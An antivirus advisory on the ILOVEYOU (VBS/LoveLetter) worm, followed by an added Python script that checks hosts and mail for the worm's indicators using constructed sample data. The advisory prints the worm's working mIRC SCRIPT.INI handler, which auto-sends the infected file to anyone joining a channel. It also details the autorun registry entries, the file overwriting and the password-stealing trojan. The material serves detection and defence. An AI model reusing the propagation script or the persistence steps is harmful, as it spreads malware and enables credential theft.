Virus Name: VBS/LoveLetter.worm
Aliases: none known
Date Discovered: Thursday May 4th 2000
DAT included: 4077
Risk: High

Characteristics:

This worm is a VBS program that is sent attached to an email with the subject ILOVEYOU. The mail contains the message "kindly check the attached LOVELETTER coming from me." The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs. If the user runs the attachment, the worm runs using the Windows Scripting Host program, which is not normally present on Windows 95 or Windows NT unless Internet Explorer 5 is installed.

When the worm is first run it drops copies of itself in the following places :-

C:\WINDOWS\SYSTEM\MSKERNEL32.VBS
C:\WINDOWS\WIN32DLL.VBS
C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS

It also adds the registry keys :-

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL=C:\WINDOWS\Win32DLL.vbs

in order to run the worm at system start-up.

The worm replaces the following files :-

*.JPG
*.JPEG
*.MP3
*.MP2

with copies of itself, adding the extension .VBS to the original filename. So PICT.JPG would be replaced with PICT.JPG.VBS, and this file would contain the worm.

The worm also overwrites the following files :-

*.VBS
*.VBE
*.JS
*.JSE
*.CSS
*.WSH
*.SCT
*.HTA

with copies of itself and renames the files to *.VBS.

The worm creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm; this is then sent to IRC channels if the mIRC client is installed. This is accomplished by the worm replacing the file SCRIPT.INI with the following script :-

[script]
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM
n3=}

After a short delay the worm uses Microsoft Outlook to send copies of itself to all entries in the address book. The mails are of the same format as the original mail.
This worm also has another trick up its sleeve in that it tries to download and install an executable file called WIN-BUGSFIX.EXE from the Internet. This exe file is a password stealing program that will email any cached passwords to the mail address [log in to unmask]. In order to facilitate this download the worm sets the start-up page of Microsoft Internet Explorer to point to the web-page containing the password stealing trojan.

The email sent by this program is as follows :-

From: [log in to unmask]
To: [log in to unmask]
Subject: Barok... email.passwords.sender.trojan
X-Mailer: Barok... email.passwords.sender.trojan---by: spyder
Host: goat1
Username: Goat1
IP Address: 192.168.0.2
RAS Passwords:... <password information goes here> ...
Cache Passwords:... <password information goes here> ...
goatserver.goatnet/goatserver.goatnet : GOATNET\goat1 : MAPI : MAPI

The password stealing trojan is also installed via the following registry key :-

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX

to auto run at system start-up. After it has been run the password stealing trojan copies itself to WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key with

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32=WinFAT32.EXE
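The indicators above (dropped files, Run/RunServices autorun values, the PICT.JPG.VBS double-extension pattern, the mIRC SCRIPT.INI handler, and the ILOVEYOU mail with its .TXT.vbs attachment) translate directly into host-triage and mail-gateway checks. The script below is an added example written for this description; it is not tooling from the advisory's vendor. The file listing, registry export, and mail headers it scans are constructed sample data, and the value data for the WIN-BUGSFIX autorun entry is an assumption (the description names the key but not its data). It goes slightly beyond the text in two places, both marked: any Run/RunServices value launching a .VBS is reported, and any attachment whose final extension is one of the script types the worm overwrites is treated as suspicious when it hides behind a double extension.

```python
"""Indicator checks for the VBS/LoveLetter.worm description above.
Added example; sample inputs are constructed, not captured from a real host."""
import re

# Paths the description says the worm and the password stealer create.
DROPPED_FILES = {
    r"C:\WINDOWS\SYSTEM\MSKERNEL32.VBS",
    r"C:\WINDOWS\WIN32DLL.VBS",
    r"C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS",
    r"C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM",
    r"C:\WINDOWS\SYSTEM\WINFAT32.EXE",
}
# Autorun value names from the Run / RunServices keys in the description.
AUTORUN_NAMES = {"MSKERNEL32", "WIN32DLL", "WIN-BUGSFIX", "WINFAT32"}
# Media types the worm replaces, keeping the name and appending .VBS.
REPLACED_EXTS = {"JPG", "JPEG", "MP3", "MP2"}
# Script types the worm overwrites; also the attachment types a gateway should distrust.
SCRIPT_EXTS = {"VBS", "VBE", "JS", "JSE", "CSS", "WSH", "SCT", "HTA"}


def check_paths(paths):
    """Flag known dropped files and PICT.JPG.VBS-style double extensions."""
    hits = []
    for p in paths:
        u = p.upper()
        if u in DROPPED_FILES:
            hits.append(("dropped-file", p))
            continue
        stem, _, ext = u.rpartition(".")
        inner = stem.rpartition(".")[2]
        if ext == "VBS" and inner in REPLACED_EXTS:
            hits.append(("double-extension", p))
    return hits


def check_registry_export(text):
    """Scan a .reg-style export for the autorun values named above. Any
    Run/RunServices value launching a .VBS is also reported (broader
    heuristic added here, not stated in the description)."""
    hits, key = [], ""
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].upper()
            continue
        m = re.match(r'"([^"]+)"="(.*)"$', line)
        if not m or not key.endswith(("\\RUN", "\\RUNSERVICES")):
            continue
        name, data = m.group(1), m.group(2)
        if name.upper() in AUTORUN_NAMES or data.upper().endswith(".VBS"):
            hits.append(("autorun", f"{key}\\{name}={data}"))
    return hits


def check_mirc_script(script_ini):
    """Report an on-JOIN handler that DCC-sends a file to everyone who joins."""
    on_join = re.search(r"on\s+\d*:JOIN:", script_ini, re.I)
    dcc = re.search(r"dcc\s+send\s+\$nick\s+(\S+)", script_ini, re.I)
    if on_join and dcc:
        return ("mirc-autosend", dcc.group(1))
    return None


def classify_mail(subject, attachment):
    """Gateway rule: the ILOVEYOU subject, or a script attachment hidden
    behind a double extension such as LOVE-LETTER-FOR-YOU.TXT.vbs."""
    if subject.strip().upper() == "ILOVEYOU":
        return "subject-match"
    parts = attachment.upper().split(".")
    if len(parts) >= 3 and parts[-1] in SCRIPT_EXTS:
        return "double-extension-script"
    return None


# --- constructed sample input ---
SAMPLE_PATHS = [
    r"C:\WINDOWS\SYSTEM\MSKERNEL32.VBS",
    r"C:\MY DOCUMENTS\PICT.JPG.VBS",
    r"C:\WINDOWS\NOTEPAD.EXE",
    r"C:\WINDOWS\WIN32DLL.VBS",
]
SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"MSKernel32"="C:\\WINDOWS\\SYSTEM\\MSKernel32.vbs"
"WIN-BUGSFIX"="C:\\WINDOWS\\SYSTEM\\WIN-BUGSFIX.EXE"
"Example"="C:\\PROGRAM FILES\\EXAMPLE\\EXAMPLE.EXE"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Win32DLL"="C:\\WINDOWS\\Win32DLL.vbs"
'''  # WIN-BUGSFIX value data is an assumption; "Example" is a benign control entry.
SAMPLE_SCRIPT_INI = r'''[script]
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM
n3=}'''

if __name__ == "__main__":
    for hit in check_paths(SAMPLE_PATHS) + check_registry_export(SAMPLE_REG):
        print(*hit)
    print(*check_mirc_script(SAMPLE_SCRIPT_INI))
    print(classify_mail("ILOVEYOU", "LOVE-LETTER-FOR-YOU.TXT.vbs"))
```

Run it as a script to see the findings for the constructed inputs; on a real host, feed check_paths a directory walk of C:\WINDOWS and user document folders, and check_registry_export the output of a registry export of the two Run keys.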